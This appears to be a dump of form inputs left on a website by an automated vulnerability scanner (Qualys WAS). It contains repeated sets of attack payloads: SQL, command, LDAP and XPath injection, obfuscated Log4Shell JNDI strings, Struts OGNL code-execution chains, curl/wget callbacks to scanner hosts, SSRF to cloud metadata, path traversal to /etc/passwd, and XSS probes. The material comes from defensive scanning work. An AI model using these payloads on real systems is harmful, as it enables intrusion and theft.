1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
require('child_process').execSync('sleep 29').toString()
1
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1'; var djci=sleep(29*1000);//
1
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1;SELECT sleep(29); --
1
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1
1" or true() or "and" = "and
1
1
1 or not(false()) or 'true' = 'true'
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
11 or 11=12
1
11 or 11=11
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1' and 'tpklq'='xqlkp
1
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1
1 and NULL IS NULL
1
1 oR 6248=2491 + 3757
1
1 or 6248 IS NULL
1
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1' and 3789=1391 --
1
1' or 3789=3789 --
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl 9a023dd497d4f71c722f3423314c11813c1e759d.18155049393642422.2512743420.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 90130aa1eab5f8453b8e49c28ea055ecdab6831a.18155049393642422.2096437737.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 9a26ace14ca9f6841a057d577d736a190f6ffdb2.18155049393642422.3785638363.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 11ddde9e7bea72dc09734144abf9ba367e33b9fe.18155049393642422.2922309112.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 8d9d089cc40eb9dc2571a7cfe42c4c62a51fe46d.18155049393642422.2837792433.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","bc17c23362493330e2720eeba23ed63bb5f9aa00.18155049393642422.121824393.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://811230612d6cb8c8317cb10ae49e1dfc0de5d415.18155049393642422.3042232659.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://bd27c4954acd678b1e6622a3e155dc90dcaf94ab.18155049393642422.3382809549.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//f397c7c9adf32b4df04717e80aea80db698fb963.18155049393642422.3211361955.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://a9d76d38130fd371bc47bed60810961d9fc4e73d.18155049393642422.2231840909.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//9d2aa79ece2af526082dd10f4898e520d4cda6be.18155049393642422.655620050.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://15e35978b4b6275d43585408813eed84d9edf962.18155049393642422.1286420907.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//80ce7297f09aa0892bcc1ed080dfaa5af2e5e717.18155049393642422.2275638787.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://88e00b685d0d23182a7000dc8570dbd82f798657.18155049393642422.3800013933.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://b4484c838ec1ae808fe3303acec94097c8e86ed5.18155049393642422.1147713155.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
${jndi:rmi://6624191d510c1004499ae0b01992db0a11278e6d.18155049393642422.4251843661.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
1
${jndi:ldap://8d256923f817b6b0bbcb4a2a0b19ecbc0b150f57.18155049393642422.2892383015.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
0e6ae8656927c383f7bdb2e054f99e5f7e3e1a07.18155049393642422.2652938675.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://9acad9d299518a94b36655dc6b4773d7565ce8ab.18155049393642422.2936759034.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@466612947a9390a047620bb0eb2249417ffa7a98.18155049393642422.3845779171.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1)(|(objectclass=*)
1
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1)(attribute2=*)
1
1
QualysWAS${150797*150797}QualysWAS
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
1
http://169.254.169.254/latest/meta-data/
1
function(){qxss8bBWeeVM};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
"-qxss2Nid2aNU()-"
1
'-qxssBobC8kCu()-'
1
1
*/;(function(){qxss75DW9zNw});/*
1
9 ;(function(){qxssK17mfPQu});//
1
9;(function(){qxssUVON4MF1});//
1
';(function(){qxssFn1qYv3w});/**/'
1
qualys(aqxss44j0Sxn6)xyz
1
");(function(){qxssZQUHX7VP});/**/"
1
";(function(){qxssHkUXsI9k});/**/"
1
javascript:qxss(X2984093164Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1e309
1
1
(
1
,
``
1
/*
1
1
#
1
;--
1'
1
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
1
< script a=4>qss9K3iHkAq=7< /script>
1
" onEvent=X2984093164Y1_2Z
1
' onEvent=X2984093164Y1_2Z
1
"'>
1
BODY{background:url("javascript:qss7TA0FQ95=7")}
1
1
1">
1
1
1
"'>
1
1
1
1 _q_q=random(V6bHH2J0)
1
1
_q=random(X2984093164Y1_2Z)
1
_q=random(X2984093164Y1_2Z)
1
"'>
1
z-->
1"'>
1
1
">
1
javascript:qxss(X2984093164Y1_2Z);
" onEvent=X2984093164Y1_2Z
1
' onEvent=X2984093164Y1_2Z
1
1
_q=random(X2984093164Y1_2Z)
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1',0,0);WAITFOR DELAY'00:00:29'--
1
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1);WAITFOR DELAY '00:00:29'--
1
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
ping -c2 -i91 localhost
1
1
aaaa&ping -n 92 localhost&
1
1
1
1" or not(false()) or "true" = "true
1
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1' or not(false()) or 'true' = 'true
1
1
1' and false() and 'or' = 'and
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
1
11 or 11=12
1
11 or 11=11
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1' and 'tpklq'='xqlkp
1
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1 and 7248 IS NULL
1
1
1 and NULL IS NULL
1 oR 6248=2491 + 3757
1
1
1 or 6248 IS NULL
1
1 or NULL IS NULL
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1' and 3789=1391 --
1
1
1' or 3789=3789 --
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl a868ce7cc795b0f7d6aedac0c4fa23f9732b0b47.18128162393642422.4238956914.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
1
__import__('os').popen('wget db3f9714136474cec2df602bc972fb87c9c3778a.18128162393642422.1758070453.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 9e99b6abb58963ad222941606ab6bac7508375b3.18128162393642422.1473749377.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 46fd2191f3d6bb6c8867e67bc2eb360c99963d44.18128162393642422.3390899839.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 9734b42e99f39082e005d1777c8764d4a880e142.18128162393642422.1419601766.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","93b0f2d5c297e8833e66de180d9a483ccd287425.18128162393642422.3968666855.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://cf29b70ebaf86a19663c66acc7c26cd2a60c01cc.18128162393642422.3330802440.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://36b1bf488f34cbe8987d49c45d4834cfb2c3539b.18128162393642422.1381233525.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//69f027c48df6aaf4a22d34138b7a2c0e1ee367de.18128162393642422.526670398.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://3c8a96ba1d19dea880733aa9fcf4eafdad6bfb81.18128162393642422.3969159695.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//01c75d40dd76658628857c6b3e0af8b397f05049.18128162393642422.2913862314.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
${jnd${123%ff:-${123%ff:-i:}}ldap://ee6ded353e0b919d5267b692f0ee4dc9c9531c93.18128162393642422.1487667670.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
1
${j${::-n}di:ldap${::-:}//b4da0bb03253e8a3984467f7435ce767d85a839a.18128162393642422.1580977140.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://3b6b91e36b2f94dc44a1be0abd4a5d1aee3b1e51.18128162393642422.4167954596.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://7dd11a3f158bfab7f51495f5775799db53b9913b.18128162393642422.3383462862.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://4c05caab3a246409e916ddf8281b55999ece9d9a.18128162393642422.2637490731.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
${jndi:ldap://4220879922ca811d95673d597182b577066963ec.18128162393642422.422640434.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
1
6bfd597a4101019eaa9c84c23646e78bf7879248.18128162393642422.1692414641.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://10f0a7c0ceb22547bdf07aaea11f05262813988e.18128162393642422.777516698.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@453a4c0374d6bb0d66743449866bf793f6305356.18128162393642422.3406907664.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1*(|(objectclass=*))
1
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
QualysWAS${150797*150797}QualysWAS
1
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
https://community.qualys.com/
1
1
http://169.254.169.254/latest/meta-data/
1
function(){qxsslxdkU69q};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssAHYI11Go()-"
'-qxss6xQx292m()-'
1
1
*/;(function(){qxssd4H9yq9s});/*
1
9 ;(function(){qxssFh3yNG4c});//
1
9;(function(){qxssVd569M7t});//
';(function(){qxssn8j6rSo3});/**/'
1
qualys(aqxssIBMw8Lod)xyz
1
1
");(function(){qxsse1DQ3GSS});/**/"
1
";(function(){qxssDeY4K52E});/**/"
1
javascript:qxss(X150924172Y1_2Z);
1
http://rfitest/
|netstat -an
1
a(){}phpinfo(); function a
1
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
../../../../../../../Windows/System32/drivers/etc/hosts
1
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
../../../../../../../etc/passwd
1
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
,
1
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
111222
1
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssTU2q7I3N=7< /script>
1
" onEvent=X150924172Y1_2Z
' onEvent=X150924172Y1_2Z
1
1
"'>
1
BODY{background:url("javascript:qssY32lW5KW=7")}
1
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(w09YobB1)
1
_q=random(X150924172Y1_2Z)
1
_q=random(X150924172Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X150924172Y1_2Z);
1
" onEvent=X150924172Y1_2Z
1
' onEvent=X150924172Y1_2Z
1
_q=random(X150924172Y1_2Z)
"'>
1
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(37*1000))
1
require('child_process').execSync('sleep 38').toString()
1
__import__('os').popen('sleep 38').read()
1
1' + sleep(38*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(38*1000) + '
1'; var djci=sleep(38*1000);//
1'; var djci=sleep(1*1000);//
1
1
1
1'; var djci=sleep(38*1000);//
1' OR (SELECT 1337 FROM (SELECT(SLEEP(1)))prime) AND 'qualys'='qualys
1
1
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(38)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(38)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(38))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(38))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(38))qsqli_3333); -- OR"*/
1
1;SELECT sleep(38); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(38))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(38))qsqli_1111)
1
1
1
1',0,0);WAITFOR DELAY'00:00:37'--
1
1');WAITFOR DELAY '00:00:37'--
1
1
1';WAITFOR DELAY '00:00:37'--
1
1
1
1);WAITFOR DELAY '00:00:37'--
1;WAITFOR DELAY '00:00:37';
1;WAITFOR DELAY '00:00:01';
1;WAITFOR DELAY '00:00:37';
1;WAITFOR DELAY '00:00:01';
1
1
1
1
1;WAITFOR DELAY '00:00:37';
1
1WAITFOR DELAY '00:00:37'
1
1
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1
1" or true() or "and" = "and
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1' and false() and 'or' = 'and
1
1
1' or true() or 'and' = 'and
15 oR 9=8 + 1
1
11 or 11=12
1
1
11 or 11=11
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1
1 and NULL IS NULL
1 oR 6248=2491 + 3757
1
1 or 6248 IS NULL
1
1
1 or NULL IS NULL
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1
1 or 4325=4325 --
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1
1' and 3789=1391 --
1
1' or 3789=3789 --
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1') and 2634=1123 --
1
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl 62e9e9760126fcceacbc9943e2a6ede6f306bb82.18084861393642422.2852832710.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget fe545811d44a2ab7eda900a9a867b0cb5fb0f63c.18084861393642422.1095568741.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 0e32a843fc909afaebf18e09125fdcda4bac9c04.18084861393642422.2939390616.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 1acf306c1f821d9b0723a1151e463a23f31d4446.18084861393642422.1592050595.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 7ed47a156c5ae669088ad79accbc06af317ed328.18084861393642422.1639529304.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","859b7ae5de4a076e8fde534ae38341000dbd2e27.18084861393642422.4048018429.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://82a4634ef01c58ff1d0bb3801a416f73b0729d8e.18084861393642422.4273326551.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://aaffa01a827ee2cf3ca389f802345a59441d55d3.18084861393642422.1636323042.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
